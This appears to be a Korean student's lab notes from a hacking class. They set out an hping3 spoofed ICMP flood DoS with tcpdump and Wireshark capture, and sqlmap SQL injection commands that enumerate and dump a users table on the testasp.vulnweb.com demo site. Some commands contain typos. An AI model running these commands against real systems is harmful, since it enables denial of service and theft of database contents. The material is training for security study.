kali -> kali client ping 명령 -> 윈도우 서버 공격
공격자        에이전트                         공격대상

동일한 라우터에 존재         서로 다른 네트워크여도 상관없음

공격자 시스템
kali client <------> 윈도우 서버

윈도우 서버
kali client <------> 윈도우 서버


공격 실습 명령 
kali
hping3 [에이전트 주소] -a [공격대상주소] --icmp --flood

kali tcpdump
tcpdump -xX

윈도우 서버
와이어샤크


** DoS 공격을 포함하여 웹 해킹을 진행하는 툴 sqlmap 사용
파이썬으로 제작됨
: 직접 설치해서 사용하려면 파이썬을 설치 후 사용

기능 : 일반적인 시스템 정보 획득
DB 취약점(sql 취약점)에 강력하게 동작함 - sql injection
타겟사이트의 form 태그를 집중 공격
cli 인터페이스를 사용

타겟사이트 http://testasp.vulnweb.com/
0. 준비사항
해당 페이지의 기능 중 get 방식이나 post 방식으로 data를 서버에 전달하는 페이지 또는 form을 찾는다.

sqlmap -u http://testasp.vulnweb.com/showforum.asp?id=0

sqlmap -u http://testasp.vulnweb.com/showforum.asp?id=0 --current-db

sqlmap -u 타겟 -D db명 --tables
sqlmap -u http://testasp.vulnweb.com/showforum.asp?id=0 -D acuforum --talbes

sqlmap -u http://testasp.vulnweb.com/showforum.asp?id=0 -D acuforum -T users-dump

sqlmap 툴의 옵션조사 
시험범위 : 6 7 8 9 11장 연습문제